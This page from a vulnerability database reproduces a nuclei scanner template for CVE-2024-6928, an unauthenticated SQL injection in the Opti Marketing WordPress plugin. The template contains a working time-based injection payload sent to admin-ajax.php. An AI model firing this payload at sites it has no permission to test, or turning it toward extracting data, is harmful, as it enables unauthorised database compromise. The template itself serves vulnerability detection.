Lucene search
K

Opti Marketing <= 2.0.9 - SQL Injection

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

Opti Marketing <= 2.0.9 - SQL Injection in WordPress plugi

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-6928
8 Sep 202408:43
circl
CNNVD
WordPress plugin Opti Marketing 安全漏洞
8 Sep 202400:00
cnnvd
CVE
CVE-2024-6928
8 Sep 202406:00
cve
Cvelist
CVE-2024-6928 Opti Marketing <= 2.0.9 - Unauthenticated SQLi
8 Sep 202406:00
cvelist
NVD
CVE-2024-6928
8 Sep 202406:15
nvd
OSV
CVE-2024-6928
8 Sep 202406:15
osv
Patchstack
WordPress Opti Marketing plugin <= 2.0.9 - Unauthenticated SQLi vulnerability
15 Aug 202403:17
patchstack
Patchstack
WordPress Opti Marketing Plugin <= 2.0.9 is vulnerable to SQL Injection
15 Aug 202400:00
patchstack
Positive Technologies
PT-2024-37966 · WordPress · Opti Marketing
7 Sep 202400:00
ptsecurity
RedhatCVE
CVE-2024-6928
23 May 202508:58
redhatcve
Rows per page
id: CVE-2024-6928

info:
  name: Opti Marketing <= 2.0.9 - SQL Injection
  author: s4e-io
  severity: high
  description: |
    The Opti Marketing plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 2.0.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    Unauthenticated attackers can exploit SQL injection to extract, modify, or delete sensitive database information, potentially compromising the entire WordPress installation and all stored data.
  remediation: |
    Update Opti Marketing plugin to a version later than 2.0.9 to address the SQL injection vulnerability.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/opti-marketing/opti-marketing-209-unauthenticated-sql-injection
    - https://wpscan.com/vulnerability/7bb9474f-2b9d-4856-b36d-a43da3db0245/
    - https://nvd.nist.gov/vuln/detail/cve-2024-6928
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-6928
    epss-score: 0.03292
    epss-percentile: 0.86986
  metadata:
    max-request: 2
    vendor: opti-marketing
    product: opti-marketing
    framework: wordpress
    publicwww-query: "/wp-content/plugins/opti-marketing"
  tags: time-based-sqli,cve,cve2024,wpscan,wp-plugin,wp,wordpress,opti-marketing,sqli,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/opti-marketing")'
        condition: and
        internal: true

  - raw:
      - |
        @timeout 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=save_article&postId=(select*from(select(sleep(6)))a)

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
        condition: and
# digest: 490a00463044022054d0928c48c6922e6ad4b2f7720eeee9df27613d56ac6a479a82fc7a89b8496a02206fc7a106803ef26662c9859a31690f7f234e5d4d40937b43a9bf42cd32d5e1dc:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.19.8
EPSS0.03292
SSVC
17